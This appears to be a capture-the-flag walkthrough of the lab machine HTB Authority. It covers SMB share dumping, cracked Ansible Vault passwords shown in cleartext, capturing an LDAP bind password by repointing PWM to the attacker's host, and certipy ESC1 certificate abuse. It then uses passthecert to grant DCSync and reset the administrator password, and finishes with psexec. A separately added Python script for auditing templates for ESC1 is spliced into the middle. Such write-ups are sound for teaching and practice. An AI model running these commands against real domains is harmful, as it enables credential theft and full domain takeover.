HTB:Authority

Port scan

└─$ nmap -Pn -p- 10.10.11.222 --min-rate=10000 -sV
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-16 23:48 EDT
Warning: 10.10.11.222 giving up on port because retransmission cap hit (10).
Nmap scan report for bogon (10.10.11.222)
Host is up (0.24s latency).
Not shown: 64857 closed tcp ports (conn-refused), 649 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-17 07:49:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8443/tcp open ssl/https-alt
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49578/tcp open msrpc Microsoft Windows RPC
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49691/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49693/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC

SMB connection

smbclient -L 10.10.11.222
smbclient \\\\10.10.11.222\\Development

The share contains files for Ansible, a configuration management tool; dump them.

recurse on // recurse into subdirectories
prompt // turn off per-file confirmation
mget *

Cracking the hash

The dumped files contain an Ansible Vault hash.
Cracking the hash gives the following result:

pwm_admin_login: svc_pwm  
pwm_admin_password: pWm_@dm!N_!23
ladap_admin_password: DevT3st@123

Port 8443

Port 8443 hosts a PWM application. It reports that configuration mode is enabled, which means the configuration can be modified without LDAP authentication.
Logging in with the PWM password obtained earlier shows the LDAP-related settings.
The bind user is svc_ldap and its password is hidden, but the LDAP connection URL sits right above it. Change the LDAP URL to point at the attacking machine, start responder there to listen, and click Test LDAP Profile in the web UI: this makes PWM issue an LDAP bind, and the attacking machine captures the account name and password in cleartext.

WinRM

Connecting with evil-winrm gives an interactive shell.

Privilege escalation

An ADCS environment is present.


Look for exploitable templates

certipy find -target 10.10.11.222 -dc-ip 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!'  -vulnerable -stdout 

An exploitable template is found. The AUTHORITY.HTB\Domain Computers group that is allowed to enroll represents machine accounts, and ordinary users are allowed to create those.
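To show what makes a template like CorpVPN exploitable, here is a small offline audit (added example, not code from the original write-up or from Certipy) that flags the ESC1 pattern: the enrollee supplies the subject, no approval or signature is required, the EKU allows logon, and a low-privileged group can enroll. The template records, field names and the default quota of 10 are constructed assumptions modelled on the LDAP attributes Certipy reads.

```python
# Added example, not code from the original write-up: an offline audit that
# flags certificate templates with the ESC1 pattern abused here via CorpVPN.
# Template records are constructed sample data modelled on the LDAP attributes
# Certipy reads; names and values are assumptions.
ENROLLEE_SUPPLIES_SUBJECT = 0x1  # msPKI-Certificate-Name-Flag bit
PEND_ALL_REQUESTS = 0x2          # msPKI-Enrollment-Flag bit (manager approval)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# "Any domain principal" groups. Domain Computers counts only while
# ms-DS-MachineAccountQuota > 0: then any user can create a machine account
# and enrol through it, which is exactly what the write-up does.
LOW_PRIV_GROUPS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def esc1_reasons(template: dict, machine_account_quota: int = 10) -> list[str]:
    """Return why a template matches ESC1; an empty list means it does not."""
    if not template["name_flag"] & ENROLLEE_SUPPLIES_SUBJECT:
        return []  # requester cannot pick the subject/UPN, so no impersonation
    if template["enrollment_flag"] & PEND_ALL_REQUESTS:
        return []  # manager approval blocks unattended issuance
    if template.get("ra_signatures", 0) > 0:
        return []  # an authorized signature is required
    ekus = set(template["ekus"])
    if ekus and not ekus & AUTH_EKUS:
        return []  # certificate cannot be used for logon
    exposed = set(template["enroll"]) & LOW_PRIV_GROUPS
    if machine_account_quota <= 0:
        exposed.discard("Domain Computers")
    if not exposed:
        return []
    return ["enrollee supplies subject (UPN/SAN), no approval or signature needed",
            "logon EKU: " + (", ".join(sorted(ekus & AUTH_EKUS)) or "none set (any purpose)"),
            "enrollable by: " + ", ".join(sorted(exposed))]

def audit(templates: list[dict], machine_account_quota: int = 10) -> dict[str, list[str]]:
    """Map each ESC1-vulnerable template name to its findings."""
    return {t["name"]: r for t in templates if (r := esc1_reasons(t, machine_account_quota))}

SAMPLE_TEMPLATES = [  # constructed sample data, not pulled from the target
    {"name": "CorpVPN", "name_flag": 0x1, "enrollment_flag": 0x0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Computers"]},
    {"name": "User", "name_flag": 0x0, "enrollment_flag": 0x0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    {"name": "WebServer", "name_flag": 0x1, "enrollment_flag": 0x0,
     "ekus": ["1.3.6.1.5.5.7.3.1"], "enroll": ["Domain Admins"]},
]
```

Running `audit(SAMPLE_TEMPLATES)` flags only CorpVPN; setting the quota to 0 (or removing Domain Computers from the enrollment rights, or requiring manager approval) makes the finding disappear, which is the fix order a defender would apply.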
Create a machine account

addcomputer.py -method 'LDAPS' -computer-name "pentest\$" -computer-pass password -dc-ip 10.10.11.222 authority.htb/svc_ldap:lDaP_1n_th3_cle4r! -debug

Request a certificate

$ certipy req -username 'pentest$'@authority.htb -password password -ca AUTHORITY-CA -target authority.authority.htb -template CorpVPN -upn administrator@authority.htb                  
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 24
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Requesting a TGT with the certificate fails:

└─$ certipy auth -pfx administrator.pfx                                                                                                                                                    
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

Try another tool

Grant svc_ldap DCSync rights

┌──(kali㉿kali)-[~/Desktop/PassTheCert/Python]
└─$ python3 passthecert.py -action modify_user -crt ../../../user.crt -key ../../../user.key -domain authority.htb -dc-ip 10.10.11.222 -target svc_ldap -elevate
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Granted user 'svc_ldap' DCSYNC rights!

DCSync to dump the administrator hash

This errors out.

Try changing the administrator's password instead

python3 passthecert.py -action modify_user -crt ../../../user.crt -key ../../../user.key -domain authority.htb -dc-ip 10.10.11.222 -target administrator -new-pass


Connect with psexec

psexec.py authority.htb/administrator:O00R3bR7yNV8tguJN3Ptp2XXnsbNmuJO@10.10.11.222
